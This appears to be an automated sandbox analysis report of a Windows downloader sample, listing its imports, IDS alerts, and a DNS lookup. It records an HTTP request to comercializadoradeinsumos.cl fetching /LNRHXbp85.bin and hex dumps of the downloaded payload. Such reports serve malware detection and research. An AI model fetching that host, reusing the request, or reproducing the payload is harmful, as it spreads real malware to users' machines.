                                        RT_ICON0x401e680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.549718574108818
                                        RT_ICON0x402f100xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3200EnglishUnited States0.38117283950617287
                                        RT_ICON0x403bb80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6311475409836066
                                        RT_ICON0x4045400x748Device independent bitmap graphic, 24 x 48 x 24, image size 1824EnglishUnited States0.4093347639484979
                                        RT_ICON0x404c880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6693262411347518
                                        RT_ICON0x4050f00x368Device independent bitmap graphic, 16 x 32 x 24, image size 832EnglishUnited States0.4323394495412844
                                        RT_DIALOG0x4054580x144dataEnglishUnited States0.5216049382716049
                                        RT_DIALOG0x4055a00x13cdataEnglishUnited States0.5506329113924051
                                        RT_DIALOG0x4056e00x100dataEnglishUnited States0.5234375
                                        RT_DIALOG0x4057e00x11cdataEnglishUnited States0.6056338028169014
                                        RT_DIALOG0x4059000xc4dataEnglishUnited States0.5918367346938775
                                        RT_DIALOG0x4059c80x60dataEnglishUnited States0.7291666666666666
                                        RT_GROUP_ICON0x405a280x92dataEnglishUnited States0.636986301369863
                                        RT_VERSION0x405ac00x274dataEnglishUnited States0.5015923566878981
                                        RT_MANIFEST0x405d380x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                        DLLImport
                                        ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                        SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                        ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                        COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                        USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                        GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                        KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-11-06T16:29:39.486829+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549704TCP
                                        2024-11-06T16:30:17.973333+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549756TCP
                                        2024-11-06T16:30:26.040681+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549757162.240.106.189443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 6, 2024 16:30:25.084656000 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:25.084706068 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:25.084821939 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:25.129787922 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:25.129812956 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:25.808186054 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:25.808290005 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:25.878618002 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:25.878650904 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:25.879066944 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:25.879120111 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:25.882322073 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:25.927329063 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.040690899 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.040796041 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.040882111 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.040894032 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.040946007 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.040954113 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.040991068 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.073657036 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.073909998 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.157421112 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.157555103 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.158765078 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.158874035 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.190649986 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.190779924 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.191179991 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.191240072 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.274241924 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.274389982 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.274792910 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.274856091 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.275722980 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.275793076 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.276413918 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.276479959 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.277378082 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.277448893 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.307806969 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.307938099 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.308248997 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.308310986 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.308650970 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.308734894 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.349071026 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.349203110 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.391422033 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.391519070 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.391844988 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.391906977 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.392438889 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.392498970 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.392769098 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.392836094 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.393471956 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.393556118 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.394110918 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.394171953 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.394516945 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.394576073 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.395554066 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.395595074 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.395617008 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.395626068 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.395654917 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.395684004 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.396275997 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.396342993 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.424813986 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.424926043 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.425343037 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.425410986 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.425901890 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.425956964 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.426146984 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.426203966 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.426892996 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.426944017 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.426948071 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.426955938 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.426996946 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.466083050 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.466159105 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.508655071 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.508763075 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.508795023 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.508945942 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.508996010 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.509376049 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.509438992 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.509958982 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.510014057 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.510021925 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.510040045 CET44349757162.240.106.189192.168.2.5
                                        Nov 6, 2024 16:30:26.510061979 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.510102034 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.510354996 CET49757443192.168.2.5162.240.106.189
                                        Nov 6, 2024 16:30:26.510371923 CET44349757162.240.106.189192.168.2.5
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 6, 2024 16:30:24.783448935 CET5947953192.168.2.51.1.1.1
                                        Nov 6, 2024 16:30:25.073088884 CET53594791.1.1.1192.168.2.5
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 6, 2024 16:30:24.783448935 CET192.168.2.51.1.1.10xcfe8Standard query (0)comercializadoradeinsumos.clA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 6, 2024 16:30:25.073088884 CET1.1.1.1192.168.2.50xcfe8No error (0)comercializadoradeinsumos.cl162.240.106.189A (IP address)IN (0x0001)false
                                        • comercializadoradeinsumos.cl
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549757162.240.106.1894436768C:\Users\user\Desktop\wmKmOQ868z.exe
                                        TimestampBytes transferredDirectionData
                                        2024-11-06 15:30:25 UTC186OUTGET /LNRHXbp85.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                        Host: comercializadoradeinsumos.cl
                                        Cache-Control: no-cache
                                        2024-11-06 15:30:26 UTC223INHTTP/1.1 200 OK
                                        Date: Wed, 06 Nov 2024 15:30:25 GMT
                                        Server: Apache
                                        Last-Modified: Mon, 28 Oct 2024 23:11:05 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 287296
                                        Connection: close
                                        Content-Type: application/octet-stream
                                        2024-11-06 15:30:26 UTC7969INData Raw: 1e 50 b6 2e 26 94 e2 1b b5 27 ff 0e 2f d1 e0 62 0e 7d 25 32 4e 1b d6 b8 4b 48 a1 93 22 09 1f f7 af 82 21 78 4e df 13 a4 89 6e 12 e1 e2 c2 1a b9 b8 75 07 d6 6c 02 9f f5 a7 41 5d f7 47 fb de f5 4a 03 fb f9 df 0c 43 e6 e2 46 a1 1b 19 a7 ec 5a be 6b 00 05 a5 b8 f0 d2 cb 64 fc 2e ca 70 8a 6b d9 ff bf c8 e8 32 3b df 71 e5 d0 d8 33 7e f4 01 5a 99 96 1f cc b9 ef ea d7 0a 96 5b 82 0f b2 ec 9b f9 2a a8 b4 13 4d 31 c0 68 fb 50 c0 90 c0 86 dd 58 98 84 b0 19 42 1a b1 fc f4 96 c0 02 67 95 54 ee 2b db fd 20 82 7d 03 2d 48 2c 89 a9 66 81 5e f6 45 81 2b 61 29 e6 00 ac 64 11 e5 66 a6 47 77 76 54 42 e9 4b 68 25 cb de db 2e f1 d6 65 0a 45 07 40 d7 db d9 42 32 71 aa 8c b7 31 c8 b2 bb 35 52 71 fc 7d 95 a4 78 94 fb 61 98 35 42 1f b0 e9 0f 09 70 ec 2e 6b f3 14 01 cd 01 2c 85 70
                                        Data Ascii: P.&'/b}%2NKH"!xNnulA]GJCFZkd.pk2;q3~Z[*M1hPXBgT+ }-H,f^E+a)dfGwvTBKh%.eE@B2q15Rq}xa5Bp.k,p
                                        2024-11-06 15:30:26 UTC8000INData Raw: 94 0d 01 16 34 39 5a 8e b7 c5 9d 40 41 11 68 86 ec 40 78 86 9a 7c 9a 8d 81 fc 7b 7d ce df 6f 10 dd b9 29 b2 66 17 ed 16 d8 0e cf 26 b7 cb c8 60 60 b1 4e 19 f3 56 93 8a a8 1c 16 bf 09 8f 59 5e 8a b0 9e 53 e8 da 44 2f 5e 80 d8 a4 c5 6b b8 55 ce 02 ca 25 ec a9 17 95 cd 6b 27 80 b5 74 7b 38 1a 9b 10 ce 68 2e 1b 4c a4 2b f8 5f 43 24 c9 99 b3 8c 1f ce 71 b3 73 5d e9 07 b7 57 6e 1a 66 31 b7 8f 77 b1 f9 a5 34 ea db ec a8 ad 75 86 a0 ad 57 96 20 7f b2 9c ef 49 23 79 a4 da a8 71 e5 73 04 43 29 ef 10 63 8e d9 38 db e6 43 b5 20 32 fe 35 9c 1a b0 a1 a8 63 97 86 c7 d7 b0 46 bb 90 33 49 e0 98 80 22 aa e1 f7 46 bb 4e c8 78 72 a2 91 cb af 0e af 0a 1a fe 13 8c b6 d0 6a 79 d7 46 67 7d aa a3 63 a8 cc 88 93 6b fe 8e 8e 1c 57 3f e0 90 7b 5f b7 43 a7 7d 56 1a e6 12 9e a6 4d 0a
                                        Data Ascii: 49Z@Ah@x|{}o)f&``NVY^SD/^kU%k't{8h.L+_C$qs]Wnf1w4uW I#yqsC)c8C 25cF3I"FNxrjyFg}ckW?{_C}VM
                                        2024-11-06 15:30:26 UTC8000INData Raw: c0 be de bc ee 52 5c 64 25 c7 7e 7e 12 41 2f 32 91 d1 ad ca 8b 3b 7b a3 ce b5 0a 0d 32 ff b3 b9 93 b8 98 8d bf 1f fb 0c 88 a2 b2 bc 47 56 33 26 8a df dc e3 dd 03 17 65 0c 35 68 87 52 10 22 9a 41 59 32 3f c5 87 04 14 6e 09 ed d0 b3 84 3e dd 20 95 46 4b 4c ba c0 93 b7 e6 97 1a fc 2c ff ac cc f2 02 48 bc 4a 57 2f 7b 9b be 30 78 2d ce bc d1 33 1f b2 e1 52 59 43 e3 97 94 14 4f 3c 35 d7 7a 65 9f a7 86 17 cd 77 07 06 8e 7c 65 c1 f1 23 b2 d4 9d a4 de b0 25 fe c5 0f cc 85 0d 80 e8 4a e2 c8 52 1c ac f8 68 57 27 20 9e 05 98 43 b2 c3 dd 9e 25 c8 db 1e b4 d4 d1 d1 33 04 b9 76 40 7c 61 4c a6 e4 ff 63 51 3a 4e 00 45 ea eb 43 fb 5a f2 91 6e fd 37 25 33 2b 5e ee 67 22 70 cc 71 9a 3c 6f 53 73 ac 98 f9 3e 31 3b a9 d9 ad d5 d6 0f 6f 79 b7 27 31 09 e8 3f 62 57 34 e1 4d 02 7f
                                        Data Ascii: R\d%~~A/2;{2GV3&e5hR"AY2?n> FKL,HJW/{0x-3RYCO<5zew|e#%JRhW' C%3v@|aLcQ:NECZn7%3+^g"pq<oSs>1;oy'1?bW4M
                                        2024-11-06 15:30:26 UTC8000INData Raw: 07 16 22 03 b9 6e 28 de b4 2c 87 c0 6c 0b df bd be 80 e1 16 ff 17 1c 7e 92 5b d9 75 27 d8 48 0c ba b9 9c 08 a1 e1 7a 4e fc 3d 08 98 f1 b5 b3 6d 16 11 19 e4 01 29 19 48 d9 ca 33 06 ce 8d dd a0 31 cd ed 05 04 e3 b2 f2 f6 ee f9 c0 ab 58 23 4f dc 72 e8 b2 00 3a f0 2f 86 35 52 9c eb ba 77 7d 58 03 67 ce f9 f5 d7 de 21 78 01 c9 6a 80 ad 2f 1b 27 18 84 60 d2 4e 79 a5 e1 75 18 75 ce 1a 95 1c 0b c7 4d af 00 77 f0 be 61 d6 84 f2 15 da 6b 03 52 40 91 2c c4 5d 1c 4d 96 e1 e6 de df 97 9f 86 e5 d2 66 52 27 3e c1 08 1d fa 76 6d ba e4 7e 02 40 3f 82 c4 d8 1c 86 2c af 79 d4 fc e1 94 2e 32 e1 4a 09 e1 12 ca 63 e3 a8 b4 80 65 94 53 b4 af ba 17 14 7d f2 f7 1b b9 d1 23 e1 be b8 5f 20 f1 63 1a c6 1c 15 e1 d9 ae db e6 fb f6 57 bc 74 a3 60 09 ed cf 96 03 ee 3d de 3f b7 a8 8a eb
                                        Data Ascii: "n(,l~[u'HzN=m)H31X#Or:/5Rw}Xg!xj/'`NyuuMwakR@,]MfR'>vm~@?,y.2JceS}#_ cWt`=?
                                        2024-11-06 15:30:26 UTC8000INData Raw: 95 9a 5c 69 52 ed 8b 61 b0 cd 0e c4 f4 f5 32 7b 49 cb a5 66 9f 87 93 27 c1 05 c2 fc 71 ff 25 70 f6 60 c0 56 1e c1 24 05 1a 66 04 b8 51 0c 03 b8 01 7b a8 cb a0 44 08 5b 7d 3c f4 28 87 8f bd 7f 52 c3 04 12 ea 5e bd 45 12 0d 22 39 49 0d 2e b3 5f eb 9d c0 3d 44 9e 19 f8 21 ed 03 c3 bb f3 0f 77 41 c1 92 32 fd ed ea 5b 5f c1 1b c1 95 a1 17 14 26 98 82 b3 3b 86 15 9b 90 28 25 e6 0d 20 d9 4b 72 54 ca 6e 75 6b 06 01 23 4f 4a d0 47 1f 3b 48 fd 41 9f 53 e1 55 76 43 6f bc d1 6f 56 49 dd fb 2c 84 24 ed 15 8b b9 52 e1 24 f0 bf 8b 90 31 c8 6e 70 3b f0 42 20 bd 35 9f 65 a3 0f a6 e4 99 11 9b 0d 8e 00 7b 17 19 3a b7 32 a2 08 24 e1 8e d7 a7 ab 51 b7 48 65 cb 32 63 5c 13 3b 46 2a f1 f8 f5 a7 11 82 9a 25 20 ae 94 30 35 82 fc 04 ce 57 41 f0 13 f1 6a 0f 3a d6 5a 0e dd 61 42 8c
                                        Data Ascii: \iRa2{If'q%p`V$fQ{D[}<(R^E"9I._=D!wA2[_&;(% KrTnuk#OJG;HASUvCooVI,$R$1np;B 5e{:2$QHe2c\;F*% 05WAj:ZaB
                                        2024-11-06 15:30:26 UTC8000INData Raw: 4e ae 22 c9 09 65 ef b2 dd ee 50 4e b5 d1 45 12 8e 25 0f d7 e3 3b 41 14 e5 83 3a 0c 02 d3 07 f1 57 99 92 ae 7a 6f a1 21 51 a5 d4 9a 59 1f 48 14 78 02 c6 c2 b0 b7 e9 1a 5e fd 08 41 79 3c 54 29 85 3e c2 97 8e 80 d0 3d d8 99 cd 39 f3 d4 21 e2 cd 96 ee 61 e9 7e a7 ba 6c 32 54 02 39 69 21 05 5c 25 70 97 d3 0a 2b 46 91 f6 7d db d6 6e a4 73 a1 45 ed 4b a3 2c c9 2e 70 73 65 4b ea a1 79 57 ac cb b1 4d 8c 53 8f 16 b8 1b c6 ac 65 08 27 3f 03 95 76 5f b9 a3 0f e7 59 4b 1e 48 cb a3 e2 20 71 45 52 38 06 fe df d4 8e 66 31 a7 0c a4 1a 09 fc 1d f1 3d e1 16 44 42 58 ac 64 05 31 49 10 17 4f dc 3a 7c b1 44 6d c9 f9 75 d7 e2 b7 f6 da 96 c5 2b 2f 51 91 c1 6d 49 11 0f 56 a0 a1 83 22 8f b1 88 77 f3 56 af 30 bf cf 55 7d 98 10 1e 12 4c ab 28 43 80 92 fe 93 80 86 52 33 64 9e 6e f4
                                        Data Ascii: N"ePNE%;A:Wzo!QYHx^Ay<T)>=9!a~l2T9i!\%p+F}nsEK,.pseKyWMSe'?v_YKH qER8f1=DBXd1IO:|Dmu+/QmIV"wV0U}L(CR3dn
                                        2024-11-06 15:30:26 UTC8000INData Raw: ca d1 5a 41 4d 4f 30 9c cb 7d 1a 22 f7 a3 16 ca df 73 dc c0 89 bb 44 48 70 43 7b 9b f1 09 85 b2 1e 5f 7e 71 3d 2e fe e1 eb a2 34 41 4a e3 e6 be 5c de b7 1d 8d c7 db 30 d6 5c ad 21 68 c6 51 bd 75 81 37 a9 fe f4 1d 1c 15 96 0e 32 47 15 be fc 53 b7 56 6c 83 57 77 ae 05 f3 dd 12 7c 6c bc 0d d7 c0 f3 b7 ca 0d 29 5e 2a 4e 7c 2f 50 00 ef a4 c8 ec 7a c8 3f 46 4a 8f 06 bd d1 8f f6 fc a1 a2 c0 b8 08 b3 ff a3 8e 29 17 9c 1f ee 46 5c a8 3d 42 82 e9 d3 63 d5 72 a2 9e dd a2 01 a4 28 49 ad 4e 89 98 ff 72 ac 34 c4 b5 6a e6 e2 13 29 fe 5a 92 c2 16 e7 14 bf 55 0e 94 53 8f e9 72 49 bc aa 5a f0 d7 74 24 db 4b 88 c5 ec 50 69 95 d1 bf d1 3c 97 d6 53 63 c5 14 92 54 b8 83 8a bb f3 88 55 96 4e 75 ca a0 eb 41 f8 89 7c c6 29 16 58 b1 b1 80 e9 6e f0 9c 0b 33 da 9a a5 dd 9c 96 ec f0
                                        Data Ascii: ZAMO0}"sDHpC{_~q=.4AJ\0\!hQu72GSVlWw|l)^*N|/Pz?FJ)F\=Bcr(INr4j)ZUSrIZt$KPi<ScTUNuA|)Xn3
                                        2024-11-06 15:30:26 UTC8000INData Raw: 3a d2 42 0e e7 5d 37 4c c2 8b 9a 15 0e fe 8f 45 39 61 04 79 ef f1 84 50 fc 30 75 74 f8 3e fe 5c 50 67 b5 fa cb 4d d0 a5 4c 15 c9 11 df 62 3b 90 e4 ad df 29 9b 85 8f 16 4a e9 0e a4 df 8b fc 51 c4 25 7a bf e1 9d 29 f0 ad 0e c5 6c 31 81 25 8d a4 e4 cf 4f fb 20 92 98 fc 9a 93 0c e7 60 6a e6 46 56 57 9b 8c 75 6b df eb c7 59 9d 9c 56 f7 f6 37 34 73 86 e3 72 21 5c b3 b2 54 6a f2 be f5 b5 62 25 f7 22 2b 73 37 26 89 a2 01 a1 d7 b4 1e 3f 49 4c c5 c4 36 54 99 b4 76 3a 35 07 14 8f 72 29 4a 49 24 2b ad 59 90 c1 82 4a 22 3d 1c 67 2e 16 84 07 e4 0c 90 f5 61 a3 5b 5e f8 ce 22 d1 ec 70 d7 0a c8 22 36 3d 0d 2a f5 69 1c 75 f8 bd 79 b3 d4 a0 72 0a 9a 97 10 35 81 3e 8c 9b 47 43 52 4b 21 74 9e 93 96 8f 1a e0 b3 41 44 6b 57 8b 89 6c 7a 2e 96 31 01 85 7f 3d 75 06 bd 70 b7 46 24
                                        Data Ascii: :B]7LE9ayP0ut>\PgMLb;)JQ%z)l1%O `jFVWukYV74sr!\Tjb%"+s7&?IL6Tv:5r)JI$+YJ"=g.a[^"p"6=*iuyr5>GCRK!tADkWlz.1=upF$
                                        2024-11-06 15:30:26 UTC8000INData Raw: f9 e3 d2 f8 63 62 86 bd 34 c2 51 05 f0 9d b5 c7 77 35 63 fe 43 ac 6f 67 3a 2d ff d7 53 17 81 60 22 b8 a2 f5 19 d0 22 96 cf 49 08 dd a8 fa 82 a6 1a ca 9d 1d 5e e1 9b 52 07 3f 35 bd 31 a8 d3 c3 b1 94 c5 cd 33 f6 0d 55 75 0b dd 97 9f d1 70 9e ed 0c ed b4 66 5a a5 71 67 89 5c 55 5e ab b6 53 b6 d4 87 e0 f6 08 3a 4c 51 b3 7f d3 de 78 c9 19 49 a1 50 3a e7 3d 0c ca 1c ca 7b 2a 88 18 a0 8c 08 4e 7d 33 fa 7a e7 81 e8 1f 64 e1 a1 2d c5 ee 43 ec a1 cf 62 b9 48 f8 b0 8a 65 bf b7 34 95 87 f1 c0 c1 2b 7e cd 3a 9a ed 3b 5f 46 ad 69 43 5b 8e 9d b9 7a 93 22 b6 39 b2 a4 7c cc b6 09 df c2 1f c0 f9 5f e3 6f bd 02 f1 b2 1a 00 cf ea b3 ff a9 c6 1f 0b e8 ec 49 cd 34 5f e7 68 eb 58 12 ed cf 1c 30 3b 3f 1c c9 e8 0d d2 2c d5 cc 01 c9 57 93 cd b4 27 14 1a f6 57 4f bb e0 ed 5e 6c 0c
                                        Data Ascii: cb4Qw5cCog:-S`""I^R?513UupfZqg\U^S:LQxIP:={*N}3zd-CbHe4+~:;_FiC[z"9|_oI4_hX0;?,W'WO^l
